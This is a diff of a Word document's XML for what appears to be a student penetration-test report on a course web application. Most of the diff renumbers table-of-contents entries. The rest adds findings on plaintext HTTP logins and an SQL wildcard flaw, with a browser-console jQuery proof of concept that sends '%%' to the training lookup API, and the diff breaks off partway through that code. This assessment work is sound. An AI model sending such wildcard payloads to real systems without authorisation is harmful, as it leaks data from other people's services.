-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393755 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399658 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4081,7 +4103,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4106,7 +4128,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393756" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399659" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4133,7 +4155,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393756 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399659 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4153,7 +4175,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4178,7 +4200,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393757" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399660" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4205,7 +4227,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393757 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399660 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4225,7 +4247,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4250,7 +4272,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393758" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399661" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4278,7 +4300,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393758 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399661 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4298,7 +4320,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4323,7 +4345,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393759" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399662" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4350,7 +4372,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393759 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399662 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4370,7 +4392,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4395,7 +4417,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393760" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399663" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4423,7 +4445,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393760 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399663 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4443,7 +4465,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4468,7 +4490,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393761" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399664" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4496,7 +4518,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393761 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399664 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4516,7 +4538,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>17</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4541,7 +4563,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393762" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399665" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4569,7 +4591,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393762 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399665 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4589,7 +4611,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>17</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4626,7 +4648,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc71393714"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc71399617"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Summary of Findings</w:t>
@@ -5250,7 +5272,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc71393715"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc71399618"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Detailed Findings</w:t>
@@ -5268,7 +5290,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc71393716"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc71399619"/>
       <w:r>
         <w:t xml:space="preserve">Finding 1 - </w:t>
       </w:r>
@@ -5323,7 +5345,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="4" w:name="_Toc71393717"/>
+            <w:bookmarkStart w:id="4" w:name="_Toc71399620"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5654,7 +5676,7 @@
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="5" w:name="_Proof_of_Concept"/>
-            <w:bookmarkStart w:id="6" w:name="_Toc71393718"/>
+            <w:bookmarkStart w:id="6" w:name="_Toc71399621"/>
             <w:bookmarkEnd w:id="5"/>
             <w:r>
               <w:rPr>
@@ -5814,7 +5836,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="7" w:name="_Toc71393719"/>
+            <w:bookmarkStart w:id="7" w:name="_Toc71399622"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5903,7 +5925,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="8" w:name="_Toc71393720"/>
+            <w:bookmarkStart w:id="8" w:name="_Toc71399623"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5999,7 +6021,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="9" w:name="_Toc71393721"/>
+            <w:bookmarkStart w:id="9" w:name="_Toc71399624"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6102,7 +6124,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="10" w:name="_Toc71393722"/>
+            <w:bookmarkStart w:id="10" w:name="_Toc71399625"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6189,7 +6211,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="11" w:name="_Toc71393723"/>
+            <w:bookmarkStart w:id="11" w:name="_Toc71399626"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6449,7 +6471,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc71393724"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc71399627"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 2 - </w:t>
@@ -6499,7 +6521,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="13" w:name="_Toc71393725"/>
+            <w:bookmarkStart w:id="13" w:name="_Toc71399628"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6739,7 +6761,7 @@
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="14" w:name="_Proof_of_Concept_1"/>
-            <w:bookmarkStart w:id="15" w:name="_Toc71393726"/>
+            <w:bookmarkStart w:id="15" w:name="_Toc71399629"/>
             <w:bookmarkEnd w:id="14"/>
             <w:r>
               <w:rPr>
@@ -6943,7 +6965,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="16" w:name="_Toc71393727"/>
+            <w:bookmarkStart w:id="16" w:name="_Toc71399630"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7066,7 +7088,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="17" w:name="_Toc71393728"/>
+            <w:bookmarkStart w:id="17" w:name="_Toc71399631"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7151,7 +7173,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="18" w:name="_Toc71393729"/>
+            <w:bookmarkStart w:id="18" w:name="_Toc71399632"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7226,7 +7248,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="19" w:name="_Toc71393730"/>
+            <w:bookmarkStart w:id="19" w:name="_Toc71399633"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7309,7 +7331,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="20" w:name="_Toc71393731"/>
+            <w:bookmarkStart w:id="20" w:name="_Toc71399634"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7414,7 +7436,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc71393732"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc71399635"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 3 - </w:t>
@@ -7464,7 +7486,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="22" w:name="_Toc71393733"/>
+            <w:bookmarkStart w:id="22" w:name="_Toc71399636"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7666,7 +7688,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="23" w:name="_Toc71393734"/>
+            <w:bookmarkStart w:id="23" w:name="_Toc71399637"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7753,7 +7775,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="24" w:name="_Toc71393735"/>
+            <w:bookmarkStart w:id="24" w:name="_Toc71399638"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7829,7 +7851,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="25" w:name="_Toc71393736"/>
+            <w:bookmarkStart w:id="25" w:name="_Toc71399639"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7935,7 +7957,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="26" w:name="_Toc71393737"/>
+            <w:bookmarkStart w:id="26" w:name="_Toc71399640"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8027,7 +8049,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="27" w:name="_Toc71393738"/>
+            <w:bookmarkStart w:id="27" w:name="_Toc71399641"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8158,7 +8180,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="28" w:name="_Toc71393739"/>
+            <w:bookmarkStart w:id="28" w:name="_Toc71399642"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8291,7 +8313,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc71393740"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc71399643"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -8347,7 +8369,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="30" w:name="_Toc71393741"/>
+            <w:bookmarkStart w:id="30" w:name="_Toc71399644"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8380,34 +8402,52 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ensitive information like the username and password transported via HTTP are not encrypted so it is possible that an attacker intercepts the packet</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and read directly from it.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>S</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ensitive information like the username and password transported via HTTP are not encrypted so it is possible that an attacker intercepts the packet</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> and read directly from it.</w:t>
+              <w:t>T</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>his could put all the other vulnerabilities at higher risk.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8432,7 +8472,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="31" w:name="_Toc71393742"/>
+            <w:bookmarkStart w:id="31" w:name="_Toc71399645"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8518,7 +8558,6 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
@@ -8551,7 +8590,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="32" w:name="_Toc71393743"/>
+            <w:bookmarkStart w:id="32" w:name="_Toc71399646"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8618,13 +8657,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> an </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>attacker manage</w:t>
+              <w:t xml:space="preserve"> an attacker manage</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -8709,7 +8742,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="33" w:name="_Toc71393744"/>
+            <w:bookmarkStart w:id="33" w:name="_Toc71399647"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8800,7 +8833,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="34" w:name="_Toc71393745"/>
+            <w:bookmarkStart w:id="34" w:name="_Toc71399648"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8860,10 +8893,7 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t>, possible likelihood and major impact suggest a high risk.</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t xml:space="preserve">, possible likelihood and major impact suggest a high risk. </w:t>
             </w:r>
             <w:r>
               <w:t>The use of HTTP could be one of the first causes of why other vulnerabilities can be exploited since they all require the attacker to login first. Moreover, it is important for a company dealing with banks to use HTTPS for all of their systems to inspire trusts from their clients.</w:t>
@@ -8891,7 +8921,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="35" w:name="_Toc71393746"/>
+            <w:bookmarkStart w:id="35" w:name="_Toc71399649"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8997,7 +9027,6 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:bCs/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
@@ -9025,7 +9054,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="36" w:name="_Toc71393747"/>
+            <w:bookmarkStart w:id="36" w:name="_Toc71399650"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9321,6 +9350,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve">    SSLCertificateKeyFile "/path/to/www.example.com.key"</w:t>
             </w:r>
           </w:p>
@@ -9349,7 +9379,6 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>&lt;/VirtualHost&gt;</w:t>
             </w:r>
           </w:p>
@@ -9384,7 +9413,6 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
@@ -9447,7 +9475,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="_Toc71393748"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc71399651"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -9469,7 +9497,10 @@
         <w:t>ld</w:t>
       </w:r>
       <w:r>
-        <w:t>card attack vulnerability present in the API for trainings</w:t>
+        <w:t>card attack vulnerability present in the API for training</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> lookup</w:t>
       </w:r>
       <w:bookmarkEnd w:id="37"/>
     </w:p>
@@ -9518,7 +9549,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="38" w:name="_Toc71393749"/>
+            <w:bookmarkStart w:id="38" w:name="_Toc71399652"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9551,7 +9582,72 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>Detailed description of the vulnerability, including a risk statement.</w:t>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>The</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>SQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> wildcard attack</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> vulnerability presents in the training lookup API. </w:t>
+            </w:r>
+            <w:r>
+              <w:t>Exploiting this vulnerability could result information leakage. Since all trainings are intended to be publicly visible, we conduct that this table contains no sensitive information</w:t>
+            </w:r>
+            <w:r>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> Therefore,</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>i</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">t is said to be low-risk </w:t>
+            </w:r>
+            <w:r>
+              <w:t>as</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> attackers can only read information within t</w:t>
+            </w:r>
+            <w:r>
+              <w:t>h</w:t>
+            </w:r>
+            <w:r>
+              <w:t>at</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>table</w:t>
+            </w:r>
+            <w:r>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9581,7 +9677,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="39" w:name="_Toc71393750"/>
+            <w:bookmarkStart w:id="39" w:name="_Toc71399653"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9614,8 +9710,462 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>How can we reproduce the exploit for this vulnerability?</w:t>
-            </w:r>
+              <w:t xml:space="preserve">This vulnerability can be exploited by </w:t>
+            </w:r>
+            <w:r>
+              <w:t>putting “%%”</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> [1]</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> as the training name in the API. Running the following payload in the browser console after login will list all the trainings in the store.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Note that the apikey needs to be replace with a valid one)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-variable"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>$</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>ajax</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>({</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="100" w:firstLine="180"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>url</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"http://assignment-hermes.unimelb.life/api/store.php?name=%%"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="100" w:firstLine="180"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>type</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"get"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
